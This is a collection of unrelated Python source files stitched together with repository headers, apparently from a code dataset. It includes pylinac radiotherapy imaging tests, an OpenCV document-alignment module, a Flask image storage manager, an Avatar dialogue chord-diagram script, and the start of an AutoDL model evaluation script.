self.assertIn(self.max_error_leaf, self.pf.max_error_leaf)
class PFDemo(PFTestMixin, TestCase):
"""Tests specifically for the EPID demo image."""
picket_orientation = Orientation.UP_DOWN
max_error = 0.08
abs_median_error = 0.06
max_error_picket = 0
max_error_leaf = 31
@classmethod
def setUpClass(cls):
cls.pf = PicketFence.from_demo_image()
cls.pf.analyze(sag_adjustment=cls.sag_adjustment)
@classmethod
def tearDownClass(cls):
pass # override delete behavior
def test_demo_lower_tolerance(self):
pf = PicketFence.from_demo_image()
pf.analyze(0.15, action_tolerance=0.05)
pf.plot_analyzed_image()
self.assertAlmostEqual(pf.percent_passing, 100, delta=1)
class WideGapSimulation(PFTestMixin, TestCase):
file_name = 'noisy-wide-gap-pf.dcm'
max_error = 0.11
abs_median_error = 0.06
num_pickets = 7
mean_picket_spacing = 30
class WideGapSimulationSeparate(WideGapSimulation):
separate_leaves = True
nominal_gap_mm = 16
max_error = 0.3
abs_median_error = 0.07
percent_passing = 100
class FFFWideGapSimulation(PFTestMixin, TestCase):
file_name = 'noisy-FFF-wide-gap-pf.dcm'
max_error = 0.17
abs_median_error = 0.06
num_pickets = 7
mean_picket_spacing = 30
class AS1200(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200.dcm'
max_error = 0.08
abs_median_error = 0.02
class ClinacWeirdBackground(PFTestMixin, TestCase):
file_name = 'Clinac-weird-background.dcm'
max_error = 0.12
abs_median_error = 0.02
num_pickets = 5
mean_picket_spacing = 50
invert = True
class ElektaCloseEdges(PFTestMixin, TestCase):
file_name = 'PF,-Elekta,-pickets-near-edges.dcm'
max_error = 0.23
abs_median_error = 0.07
num_pickets = 9
mean_picket_spacing = 30
mlc_skew = -0.7
class ElektaCloseEdgesRot90(PFTestMixin, TestCase):
file_name = 'PF,-Elekta,-pickets-near-edges.dcm'
max_error = 0.23
abs_median_error = 0.07
num_pickets = 9
mean_picket_spacing = 30
picket_orientation = Orientation.LEFT_RIGHT
mlc_skew = 0.7
@classmethod
def setUpClass(cls):
cls.pf = PicketFence(cls.get_filename(), log=cls.get_logfile())
cls.pf.image.rot90()
cls.pf.analyze(sag_adjustment=cls.sag_adjustment)
class MultipleImagesPF(PFTestMixin, TestCase):
"""Test of a multiple image picket fence; e.g. EPID images."""
max_error = 0.112
abs_median_error = 0.019
picket_orientation = Orientation.LEFT_RIGHT
num_pickets = 5
mean_picket_spacing = 30
delete_file = False
@classmethod
def setUpClass(cls):
path1 = get_file_from_cloud_test_repo([TEST_DIR, 'combo-jaw.dcm'])
path2 = get_file_from_cloud_test_repo([TEST_DIR, 'combo-mlc.dcm'])
cls.pf = PicketFence.from_multiple_images([path1, path2], stretch_each=True)
cls.pf.analyze(
sag_adjustment=cls.sag_adjustment,
orientation=Orientation.LEFT_RIGHT
)
class AS500(PFTestMixin, TestCase):
"""Tests for the AS500 image."""
file_name = 'AS500_PF.dcm'
max_error = 0.15
abs_median_error = 0.04
class AS5002(PFTestMixin, TestCase):
"""Tests for the AS500#2 image."""
file_name = 'AS500#2.dcm'
max_error = 0.12
abs_median_error = 0.03
mlc_skew = -0.3
class AS5003(PFTestMixin, TestCase):
"""Tests for the AS500#3 image."""
file_name = 'AS500#3.dcm'
max_error = 0.16
abs_median_error = 0.03
class AS5004(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#4.dcm'
max_error = 0.28
abs_median_error = 0.06
mlc_skew = -0.3
class AS5005(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#5.dcm'
max_error = 0.23
abs_median_error = 0.04
class AS5006(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#6.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.23
abs_median_error = 0.06
class AS5007(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#7.dcm'
max_error = 0.24
abs_median_error = 0.05
mlc_skew = -0.3
class AS5008(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#8.dcm'
max_error = 0.2
abs_median_error = 0.04
mlc_skew = -0.3
class AS5009(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#9.dcm'
max_error = 0.24
abs_median_error = 0.04
mlc_skew = -0.3
class AS50010(PFTestMixin, TestCase):
"""Tests for the AS500#4 image."""
file_name = 'AS500#10.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.24
abs_median_error = 0.05
class AS500error(PFTestMixin, TestCase):
"""Tests for the AS500#2 image."""
file_name = 'AS500-error.dcm'
num_pickets = 6
percent_passing = 99
max_error = 0.55
abs_median_error = 0.07
passes = False
mean_picket_spacing = 20
mlc_skew = -0.3
class AS1000(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000_PF.dcm'
max_error = 0.29
abs_median_error = 0.06
class AS1000_2(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000#2.dcm'
max_error = 0.24
abs_median_error = 0.07
class AS1000_3(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000#3.dcm'
max_error = 0.13
abs_median_error = 0.05
class AS1000_4(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000#4.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.18
abs_median_error = 0.05
class AS1000_90(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000-90.dcm'
picket_orientation = Orientation.LEFT_RIGHT
max_error = 0.23
abs_median_error = 0.05
class AS1000HDSmall(PFTestMixin, TestCase):
"""Tests for the AS1000 image."""
file_name = 'AS1000-HD-small.dcm'
mlc = 'HD'
max_error = 0.05
abs_median_error = 0.05
class AS1000HDFull(PFTestMixin, TestCase):
"""Tests for the AS1000 image with a smaller pattern (only inner leaves)."""
file_name = 'AS1000-HD-full.dcm'
mlc = 'HD'
max_error = 0.2
abs_median_error = 0.06
class AS1000HDFullVMAT(PFTestMixin, TestCase):
"""Tests for the AS1000 image with a smaller pattern (only inner leaves)."""
file_name = 'AS1000-HD-full-VMAT.dcm'
mlc = 'HD'
max_error = 0.2
abs_median_error = 0.08
@skip # says file isn't real DICOM TODO: Figure out why not real DICOM
class AS1000HDFullError(PFTestMixin, TestCase):
"""Tests for the AS1000 image with a few errors introduced."""
file_name = 'AS1000-HD-full-error.dcm'
mlc = 'HD'
num_pickets = 6
abs_median_error = 0.03
max_error = 0.39
def test_lower_tolerance_fails(self):
"""This image has an introduced error; this should catch with a reasonable tolerance."""
pf = PicketFence(self.file_path)
pf.analyze(tolerance=0.3, hdmlc=self.hdmlc)
self.assertFalse(pf.passed)
class AS1200(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200.dcm'
max_error = 0.08
abs_median_error = 0.02
class AS1200Error(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200-error.dcm'
num_pickets = 6
max_error = 0.48
abs_median_error = 0.05
sag_adjustment = -1.2
mean_picket_spacing = 20
class AS1200ExtendedSID(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200-ExtendedSID.dcm'
max_error = 0.12
abs_median_error = 0.04
class AS1200ExtendedSIDVMAT(PFTestMixin, TestCase):
"""Tests for the AS1200 image."""
file_name = 'AS1200-ExtendedSID-VMAT.dcm'
max_error = 0.18
abs_median_error = 0.06
# @expectedFailure # too dirty
# class AS1200HD(PFTestMixin, TestCase):
# """Tests for the AS1200 image."""
# file_name = 'AS1200-HD.dcm'
# mlc = 'HD'
# max_error = 0.05
# abs_median_error = 0.02
# num_pickets = 10
# pass_num_pickets = True
# @expectedFailure # terribly dirty image with artifacts all over.
# class AS1200HDTranslated(PFTestMixin, TestCase):
# """Tests for the AS1200 image."""
# file_name = 'AS1200-HD-translated.dcm'
# mlc = 'HD'
# max_error = 0.15
# abs_median_error = 0.02
# num_pickets = 10
# pass_num_pickets = True
class ChicagoNoError(PFTestMixin, TestCase):
dir_path = [TEST_DIR, 'Chicago']
file_name = 'PF no error.dcm'
# log = ['Chicago', 'PF no error tlog.bin']
mlc = 'HD'
max_error = 0.24
class ChicagoError(PFTestMixin, TestCase):
dir_path = [TEST_DIR, 'Chicago']
file_name = 'PF point2mm error.dcm'
# log = ['Chicago', 'PF point2mm tlog.bin']
mlc = 'HD'
max_error = 0.3
@skip
class CharlestonRA(PFTestMixin, TestCase):
file_name = ['Charleston', 'TB1', 'July2016', 'RA.dcm']
max_error = 0.17
@skip
class CharlestonG0(PFTestMixin, TestCase):
file_name = ['Charleston', 'TB1', 'July2016', 'G0.dcm']
max_error = 0.1
```
#### File: pylinac/tests_basic/test_planar_imaging.py
```python
import io
import os.path as osp
from typing import Callable
from unittest import TestCase, skip
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pylinac import LeedsTOR, StandardImagingQC3, LasVegas, DoselabMC2kV, DoselabMC2MV
from pylinac.core import image
from pylinac.planar_imaging import PlanarResult, SNCkV, SNCMV, StandardImagingQCkV, PTWEPIDQC, StandardImagingFC2
from tests_basic.utils import save_file, CloudFileMixin, get_file_from_cloud_test_repo
TEST_DIR = 'planar_imaging'
class GeneralTests(TestCase):
def test_from_file_object(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'Leeds_ccw.dcm'])
with open(path, 'rb') as f:
phan = LeedsTOR(f)
phan.analyze()
self.assertIsInstance(phan, LeedsTOR)
def test_from_stream(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'Leeds_ccw.dcm'])
with open(path, 'rb') as f:
s = io.BytesIO(f.read())
phan = LeedsTOR(s)
phan.analyze()
self.assertIsInstance(phan, LeedsTOR)
def test_overrides(self):
phan = DoselabMC2kV.from_demo_image()
phan.analyze()
def test_results_data(self):
phan = LeedsTOR.from_demo_image()
phan.analyze()
data = phan.results_data()
self.assertIsInstance(data, PlanarResult)
self.assertEqual(data.median_contrast, np.median([roi.contrast for roi in phan.low_contrast_rois]))
data_dict = phan.results_data(as_dict=True)
self.assertIsInstance(data_dict, dict)
self.assertEqual(len(data_dict), 8)
self.assertIn('pylinac_version', data_dict)
def test_results_data_no_mtf(self):
phan = LasVegas.from_demo_image()
phan.analyze()
data_dict = phan.results_data(as_dict=True)
self.assertEqual(len(data_dict), 8)
def test_multiple_plots(self):
phan = LeedsTOR.from_demo_image()
phan.analyze()
figs, names = phan.plot_analyzed_image(split_plots=True)
self.assertEqual(len(figs), 3)
files = phan.save_analyzed_image(filename='a.png', split_plots=True)
names = ('a_image.png', 'a_low_contrast.png', 'a_high_contrast.png')
for name in names:
self.assertIn(name, files)
# regular single plot produces one image/file
figs, names = phan.plot_analyzed_image()
self.assertEqual(len(figs), 0)
name = 'b.png'
phan.save_analyzed_image('b.png')
self.assertTrue(osp.isfile(name))
# stream buffer shouldn't fail
with io.BytesIO() as tmp:
phan.save_analyzed_image(tmp)
# to streams should return streams
streams = phan.save_analyzed_image(split_plots=True, to_streams=True)
self.assertEqual(len(streams.keys()), 3)
with self.assertRaises(ValueError):
phan.save_analyzed_image() # no filename and no streams is an error
def test_passing_image_kwargs(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'Leeds_ccw.dcm'])
# do normal analysis
phan = LeedsTOR(path)
phan.analyze()
x = phan.results_data().phantom_center_x_y[0]
# pass kwarg; use same dpi as image; results should be the same.
img = image.load(path)
phan = LeedsTOR(path, image_kwargs={'dpi': img.dpi})
phan.analyze()
x_manual_dpi = phan.results_data().phantom_center_x_y[0]
self.assertEqual(x, x_manual_dpi)
class PlanarPhantomMixin(CloudFileMixin):
klass: Callable
dir_path = ['planar_imaging']
mtf_50 = None
invert = False
ssd = 1000
file_name = None
rois_seen = None
@classmethod
def setUpClass(cls):
if not cls.file_name:
cls.instance = cls.klass.from_demo_image()
else:
cls.instance = cls.klass(cls.get_filename())
cls.instance.analyze(ssd=cls.ssd, invert=cls.invert)
@classmethod
def tearDownClass(cls):
plt.close('all')
del cls.instance
def test_plotting(self):
self.instance.plot_analyzed_image()
self.instance.plot_analyzed_image(low_contrast=False, high_contrast=False)
self.instance.plot_analyzed_image(image=False, low_contrast=False, high_contrast=False)
def test_saving(self):
self.instance.plot_analyzed_image()
save_file(self.instance.save_analyzed_image)
def test_pdf(self):
save_file(self.instance.publish_pdf)
def test_mtf(self):
if self.mtf_50 is not None:
self.assertAlmostEqual(self.mtf_50, self.instance.mtf.relative_resolution(50), delta=0.3)
def test_rois_seen(self):
if self.rois_seen is not None:
self.assertEqual(self.rois_seen, self.instance.results_data().num_contrast_rois_seen)
def test_results(self):
self.assertIsInstance(self.instance.results(), str)
class LeedsDemo(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.5
def test_demo(self):
LeedsTOR.run_demo() # shouldn't raise
class LeedsCCW(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.5
file_name = 'Leeds_ccw.dcm'
class Leeds45Deg(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
invert = True # inverted in v3.0 due to changed default inversion behavior
mtf_50 = 1.9
ssd = 1500
file_name = 'Leeds-45deg.dcm'
class LeedsDirtyEdges(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.3
ssd = 1000
file_name = 'Leeds-dirty-edges.dcm'
@skip("Phantom appears distorted. MTF locations are different than other phantoms")
class LeedsClosedBlades(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.3
ssd = 1500
file_name = 'Leeds-closed-blades.dcm'
class LeedsACB1(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
dir_path = ['planar_imaging', 'ACB 1']
file_path = '1.dcm'
mtf_50 = 1.4
class SIQC3Demo(PlanarPhantomMixin, TestCase):
klass = StandardImagingQC3
mtf_50 = 0.53
def test_demo(self):
StandardImagingQC3.run_demo() # shouldn't raise
class SIQC3_1(PlanarPhantomMixin, TestCase):
klass = StandardImagingQC3
file_name = 'QC3-2.5MV.dcm'
mtf_50 = 1.19
class SIQC3_2(PlanarPhantomMixin, TestCase):
klass = StandardImagingQC3
file_name = 'QC3-2.5MV-2.dcm'
mtf_50 = 1.16
def test_wrong_ssd_fails(self):
self.instance = self.klass(self.get_filename())
with self.assertRaises(ValueError):
self.instance.analyze(ssd=1500) # really at 1000
class LasVegasTestMixin(PlanarPhantomMixin):
klass = LasVegas
phantom_angle = 0
def test_plotting(self):
self.instance.plot_analyzed_image()
self.instance.plot_analyzed_image(low_contrast=False)
self.instance.plot_analyzed_image(image=False, low_contrast=False)
def test_angle(self):
self.assertAlmostEqual(self.instance.phantom_angle, self.phantom_angle, delta=1)
class LasVegasDemo(LasVegasTestMixin, TestCase):
rois_seen = 12
def test_demo(self):
LasVegas.run_demo() # shouldn't raise
@skip("Non-cardinal angles no longer supported. If support is re-added these can be reactivated")
class LasVegas10deg(LasVegasTestMixin, TestCase):
file_path = ['TrueBeam 1 - 2364', '2.5MV LV HQ 10deg - ImageRT_2016-10-6 20-12-58.dcm']
phantom_angle = 290
@skip("Non-cardinal angles no longer supported. If support is re-added these can be reactivated")
class LasVegasrotated(LasVegasTestMixin, TestCase):
file_path = ['TrueBeam 1 - 2364', '2.5MV LV HQ side2 - ImageRT_2016-10-6 20-43-3.dcm']
phantom_angle = 284
@skip("Non-cardinal angles no longer supported. If support is re-added these can be reactivated")
class LasVegasTB1(LasVegasTestMixin, TestCase):
file_path = ['TrueBeam 1 - 2364', '6MV LasVegas HQ 0deg - ImageRT_2016-10-6 20-10-17.dcm']
phantom_angle = 284.5
class DoselabMVDemo(PlanarPhantomMixin, TestCase):
klass = DoselabMC2MV
mtf_50 = 0.54
def test_demo(self):
DoselabMC2MV.run_demo()
class DoselabkVDemo(PlanarPhantomMixin, TestCase):
klass = DoselabMC2kV
mtf_50 = 2.16
def test_demo(self):
DoselabMC2kV.run_demo()
class SNCkVDemo(PlanarPhantomMixin, TestCase):
klass = SNCkV
mtf_50 = 1.76
def test_demo(self):
SNCkV.run_demo()
class SNCMVDemo(PlanarPhantomMixin, TestCase):
klass = SNCMV
mtf_50 = 0.43
def test_demo(self):
SNCkV.run_demo()
class SIQCkVDemo(PlanarPhantomMixin, TestCase):
klass = StandardImagingQCkV
mtf_50 = 1.81
def test_demo(self):
StandardImagingQCkV.run_demo()
class PTWEPIDDemo(PlanarPhantomMixin, TestCase):
klass = PTWEPIDQC
mtf_50 = 0.79
def test_demo(self):
PTWEPIDQC.run_demo()
class FC2Mixin(PlanarPhantomMixin):
klass = StandardImagingFC2
dir_path = ['planar_imaging', 'SI FC2']
field_size_x_mm = 150
field_size_y_mm = 150
field_epid_offset_x_mm = 0
field_epid_offset_y_mm = 0
field_bb_offset_x_mm = 0
field_bb_offset_y_mm = 0
fwxm = 50
@classmethod
def setUpClass(cls):
if not cls.file_name:
cls.instance = cls.klass.from_demo_image()
else:
cls.instance = cls.klass(cls.get_filename())
cls.instance.analyze(invert=cls.invert, fwxm=cls.fwxm)
def test_plotting(self):
self.instance.plot_analyzed_image()
def test_field_size(self):
results_data = self.instance.results_data()
assert results_data.field_size_x_mm == pytest.approx(self.field_size_x_mm, abs=0.3)
assert results_data.field_size_y_mm == pytest.approx(self.field_size_y_mm, abs=0.3)
assert results_data.field_epid_offset_x_mm == pytest.approx(self.field_epid_offset_x_mm, abs=0.2)
assert results_data.field_epid_offset_y_mm == pytest.approx(self.field_epid_offset_y_mm, abs=0.2)
assert results_data.field_bb_offset_x_mm == pytest.approx(self.field_bb_offset_x_mm, abs=0.2)
assert results_data.field_bb_offset_y_mm == pytest.approx(self.field_bb_offset_y_mm, abs=0.2)
class FC2Demo(FC2Mixin, TestCase):
klass = StandardImagingFC2
field_size_x_mm = 148.5
field_size_y_mm = 149.1
field_epid_offset_x_mm = -0.7
field_epid_offset_y_mm = 0.3
field_bb_offset_x_mm = -1.2
field_bb_offset_y_mm = 1.2
def test_demo(self):
StandardImagingFC2.run_demo()
class FC210x10_10FFF(FC2Mixin, TestCase):
file_name = 'FC-2-10x10-10fff.dcm'
klass = StandardImagingFC2
field_size_x_mm = 98.7
field_size_y_mm = 99.3
field_epid_offset_x_mm = 0.2
field_bb_offset_y_mm = 0.8
class FC210x10_10X(FC2Mixin, TestCase):
file_name = 'FC-2-10x10-10x.dcm'
klass = StandardImagingFC2
field_size_x_mm = 99.3
field_size_y_mm = 99.6
field_epid_offset_y_mm = 0.2
field_epid_offset_x_mm = -0.5
field_bb_offset_y_mm = 1.1
field_bb_offset_x_mm = -0.8
class FC210x10_15X(FC2Mixin, TestCase):
file_name = 'FC-2-10x10-15x.dcm'
klass = StandardImagingFC2
field_size_x_mm = 99.3
field_size_y_mm = 99.6
field_epid_offset_y_mm = 0.1
field_epid_offset_x_mm = -0.5
field_bb_offset_y_mm = 1.1
field_bb_offset_x_mm = -0.8
class FC215x15_10X(FC2Mixin, TestCase):
file_name = 'FC-2-15x15-10X.dcm'
klass = StandardImagingFC2
field_size_y_mm = 149.2
field_size_x_mm = 149.2
field_epid_offset_y_mm = 0.1
field_epid_offset_x_mm = -0.5
field_bb_offset_y_mm = 1.1
field_bb_offset_x_mm = -0.8
class FC215x15_10FFF(FC2Mixin, TestCase):
file_name = 'FC-2-15x15-10XFFF.dcm'
fwxm = 30
klass = StandardImagingFC2
field_size_y_mm = 149.5
field_size_x_mm = 149.6
field_epid_offset_y_mm = -0.1
field_epid_offset_x_mm = 0.2
field_bb_offset_y_mm = 0.8
field_bb_offset_x_mm = -0.1
``` |
{
"source": "joey5678/flask-restplus-server-example",
"score": 3
} |
#### File: flask-restplus-server-example/cv/align.py
```python
import sys
import os
import cv2
import numpy as np
def getCanny(image, ksize=5, sigmax_y=2, threshold1=12, threshold2=12, apertureSize=0, Canny_border=3):
bordertype = [cv2.BORDER_CONSTANT,cv2.BORDER_REPLICATE,cv2.BORDER_REFLECT,
cv2.BORDER_WRAP,cv2.BORDER_REFLECT_101,cv2.BORDER_TRANSPARENT,cv2.BORDER_ISOLATED][Canny_border]
if ksize % 2 == 0:
ksize += 1
if apertureSize == 0:
apertureSize = 3
else:
apertureSize = 7
threshold1 *= 5
threshold2 *= 5
# msg = "\rksize:[{}],sigmax_y:[{}],threshold1:[{}],threshold2:[{}],apertureSize:[{}], bordertype:[{}]".format(
# ksize,sigmax_y,threshold1,threshold2,apertureSize,bordertype)
# if os.get_terminal_size().columns > len(msg):
# sys.stdout.write(msg)
# else:
# print(msg)
image_ret = cv2.GaussianBlur(image, (ksize, ksize), sigmax_y, sigmax_y, bordertype)
image_ret = cv2.Canny(image_ret, threshold1, threshold2, apertureSize=apertureSize)
kernel = np.ones((ksize, ksize), np.uint8)
image_ret = cv2.dilate(image_ret, kernel, iterations=1)
return image_ret
def getMaxContour(image, mode=1, method=1):
mode_ = [cv2.RETR_EXTERNAL, cv2.RETR_LIST, cv2.RETR_CCOMP, cv2.RETR_TREE][mode]
method_ = [cv2.CHAIN_APPROX_NONE, cv2.CHAIN_APPROX_SIMPLE, cv2.CHAIN_APPROX_TC89_L1, cv2.CHAIN_APPROX_TC89_KCOS][method]
try:
#contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
contours, _ = cv2.findContours(image, mode_, method_)
except ValueError:
_, contours, _ = cv2.findContours(image, mode_, method_)
areas = list(map(cv2.contourArea,contours))
try:
max_area = max(areas)
contour = contours[areas.index(max_area)]
except ValueError:
contour = None
return contour
def getBoxPoint(contour,epsilon_k=34 ,Box_close=2):
if contour is None:
return None
close = ([True, True],[False, True],[True,False],[False,False])
hull = cv2.convexHull(contour)
# arcLength(curve, closed) -> retval
if epsilon_k == 0:
k = 0.1
else:
k = 0.1 / epsilon_k
epsilon = k * cv2.arcLength(contour, close[Box_close][0])
approx = cv2.approxPolyDP(hull, epsilon, close[Box_close][1])
approx = approx.reshape((len(approx), 2))
return approx
def orderPoints(pts):
rect = np.zeros((4, 2), dtype="float32")
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
return rect
def warpImage(image, box):
if box is None:
return image
w, h = pointDistance(box[0], box[1]), \
pointDistance(box[1], box[2])
dst_rect = np.array([[0, 0],
[w - 1, 0],
[w - 1, h - 1],
[0, h - 1]], dtype='float32')
M = cv2.getPerspectiveTransform(box, dst_rect)
warped = cv2.warpPerspective(image, M, (w, h))
return warped
def pointDistance(a, b):
return int(np.sqrt(np.sum(np.square(a - b))))
def get_points(image):
if image is None:
return None
return orderPoints(getBoxPoint(getMaxContour(getCanny(image))))
```
#### File: flask-restplus-server-example/mind/manager.py
```python
import sys
import os
import base64
import json
import uuid
from cv.utils import b64toPILImg, save_ocv_image, rawtoOCVImg, rawtoPILImg
Storage_Dir = "img_data"
"""
Save the image and meta-data
"""
class ImageStoreManager():
def __init__(self, saved_dir=Storage_Dir):
self.saved_dir = saved_dir
self.support_formats = ('jpg', 'jpeg', 'png')
def check_format(self, feature_str):
return "jpg"
# return None
def save_opencv_img(self, image, img_id=None, name_prefix=None, format='png'):
uid = img_id if img_id is not None else str(uuid.uuid1())
aligned_tag = "" if img_id is None else "aligned_"
tag = name_prefix.strip() if name_prefix is not None else aligned_tag
tag = f"{tag}_" if not tag.endswith("_") else tag
img_name = f"{tag}sv_image_{uid}.{format}"
save_ocv_image(image, os.path.join(self.saved_dir, img_name))
return uid
def saveb64(self, base64_img=None, img_metadata=None):
if base64_img:
uid = self.save_b64image(base64_img)
if img_metadata:
self.save_metadata(uid, img_metadata)
def save(self, img=None, img_metadata=None):
if img:
uid = self.save_image(base64_img)
if img_metadata:
self.save_metadata(uid, img_metadata)
def save_b64image(self, base64_img):
img_format = self.check_format(base64_img[:20])
if not img_format:
return False
uid = str(uuid.uuid1())
# save image...
image = b64toPILImg(base64_img)
img_name = f"sv_image_{uid}.{img_format}"
image.save(os.path.join(self.saved_dir, img_name))
return uid
def save_image(self, image, img_format='png'):
uid = str(uuid.uuid1())
# save image...
img_name = f"sv_image_{uid}.{img_format}"
image.save(os.path.join(self.saved_dir, img_name))
return uid
def save_metadata(self, uid, img_metadata):
js_file = f"sv_meta_{uid}.json"
try:
with open(os.path.join(self.saved_dir, js_file), 'w') as f:
json.dump(img_metadata, f)
except:
print("Fail to write metadata into json file ")
def get_image(self, image_id, img_format='png'):
data = None
img_name = f"sv_image_{image_id}.{img_format}"
if os.path.isfile(os.path.join(self.saved_dir, img_name)):
with open(os.path.join(self.saved_dir, img_name), 'rb') as f:
data = f.read()
return data
def get_OCV_image(self, image_id, img_format='png'):
data = self.get_image(image_id, img_format)
return None if data is None else rawtoOCVImg(data)
def get_PIL_image(self, image_id, img_format='png'):
data = self.get_image(image_id, img_format)
return None if data is None else rawtoPILImg(data)
img_store_manager = ImageStoreManager()
``` |
{
"source": "Joey5729/ATLA-Line-Visualization",
"score": 3
} |
#### File: Joey5729/ATLA-Line-Visualization/project.py
```python
import os
import chord
# credit to Dr. <NAME>, creator of the chord package
# https://github.com/shahinrostami/chord
def main():
# retrieve list of episode files
fileList = os.listdir('episodes/')
lineList = []
# extract the lines from files in episode list
for f in fileList:
with open('episodes/' + f) as fOb:
for line in fOb:
lineList.append(line.strip())
# set up the lists used
codeList = ['a', 'k', 's', 't', 'z', 'i', 'az', 'o', 'm', 'ty', 'su']
names = ['Aang', 'Katara', 'Sokka', 'Toph', 'Zuko', 'Iroh', 'Azula', 'Ozai', 'Mai', '<NAME>', 'Suki']
colorList = ['#fff81f', '#6eddff', '#1690b5', '#0dd610', '#ff0000', '#ffaa00', '#590069', '#804f00', '#1c0000', '#ed009a', '#80ff00']
matrix = [
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
]
# parse over the list of lines, filling the matrix
for line in lineList:
chars = line.split(',')
matrix[codeList.index(chars[0])][codeList.index(chars[1])] += 1
matrix[codeList.index(chars[1])][codeList.index(chars[0])] += 1
# yay we're done
#printMatrix(matrix, names)
chord.Chord(matrix, names, wrap_labels = 0, colors = colorList).to_html()
# debug function
def printMatrix(matrix, names):
print(end = '\t')
for name in names:
print(name, end = '\t')
print()
for y in matrix:
print(names[matrix.index(y)], end = '\t')
for x in y:
print (x, end = '\t')
print()
# very important
main()
``` |
{
"source": "Joey61Liuyi/AutoDL-Projects",
"score": 2
} |
#### File: exps/basic/basic-eval.py
```python
import os, sys, time, torch, random, argparse
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from copy import deepcopy
from xautodl.config_utils import load_config, dict2config
from xautodl.procedures import get_procedures, get_optim_scheduler
from xautodl.datasets import get_datasets
from xautodl.models import obtain_model
from xautodl.utils import get_model_infos
from xautodl.log_utils import PrintLogger, time_string
def main(args):
assert os.path.isdir(args.data_path), "invalid data-path : {:}".format(
args.data_path
)
assert os.path.isfile(args.checkpoint), "invalid checkpoint : {:}".format(
args.checkpoint
)
checkpoint = torch.load(args.checkpoint)
xargs = checkpoint["args"]
train_data, valid_data, xshape, class_num = get_datasets(
xargs.dataset, args.data_path, xargs.cutout_length
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=xargs.batch_size,
shuffle=False,
num_workers=xargs.workers,
pin_memory=True,
)
logger = PrintLogger()
model_config = dict2config(checkpoint["model-config"], logger)
base_model = obtain_model(model_config)
flop, param = get_model_infos(base_model, xshape)
logger.log("model ====>>>>:\n{:}".format(base_model))
logger.log("model information : {:}".format(base_model.get_message()))
logger.log("-" * 50)
logger.log(
"Params={:.2f} MB, FLOPs={:.2f} M ... = {:.2f} G".format(
param, flop, flop / 1e3
)
)
logger.log("-" * 50)
logger.log("valid_data : {:}".format(valid_data))
optim_config = dict2config(checkpoint["optim-config"], logger)
_, _, criterion = get_optim_scheduler(base_model.parameters(), optim_config)
logger.log("criterion : {:}".format(criterion))
base_model.load_state_dict(checkpoint["base-model"])
_, valid_func = get_procedures(xargs.procedure)
logger.log("initialize the CNN done, evaluate it using {:}".format(valid_func))
network = torch.nn.DataParallel(base_model).cuda()
try:
valid_loss, valid_acc1, valid_acc5 = valid_func(
valid_loader,
network,
criterion,
optim_config,
"pure-evaluation",
xargs.print_freq_eval,
logger,
)
except:
_, valid_func = get_procedures("basic")
valid_loss, valid_acc1, valid_acc5 = valid_func(
valid_loader,
network,
criterion,
optim_config,
"pure-evaluation",
xargs.print_freq_eval,
logger,
)
num_bytes = torch.cuda.max_memory_cached(next(network.parameters()).device) * 1.0
logger.log(
"***{:s}*** EVALUATION loss = {:.6f}, accuracy@1 = {:.2f}, accuracy@5 = {:.2f}, error@1 = {:.2f}, error@5 = {:.2f}".format(
time_string(),
valid_loss,
valid_acc1,
valid_acc5,
100 - valid_acc1,
100 - valid_acc5,
)
)
logger.log(
"[GPU-Memory-Usage on {:} is {:} bytes, {:.2f} KB, {:.2f} MB, {:.2f} GB.]".format(
next(network.parameters()).device,
int(num_bytes),
num_bytes / 1e3,
num_bytes / 1e6,
num_bytes / 1e9,
)
)
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("Evaluate-CNN")
parser.add_argument("--data_path", type=str, help="Path to dataset.")
parser.add_argument(
